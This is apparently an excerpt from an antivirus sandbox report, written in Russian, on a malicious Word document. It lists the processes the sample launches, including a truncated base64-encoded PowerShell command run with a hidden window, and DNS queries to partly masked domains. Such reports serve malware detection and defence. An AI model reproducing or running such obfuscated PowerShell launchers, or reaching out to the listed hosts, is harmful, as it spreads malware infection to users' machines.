Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5...
- DNS ASK sa####rajeet.com
- DNS ASK sa####thomaslaw.com
- DNS ASK ne##.##oridalottery.us
- DNS ASK ho####alitimes.com
- DNS ASK ri####solutions.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5...' (со скрытым окном)
- '%ProgramFiles%\windows media player\wmpnscfg.exe'
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "<PATH_SAMPLE>.doc"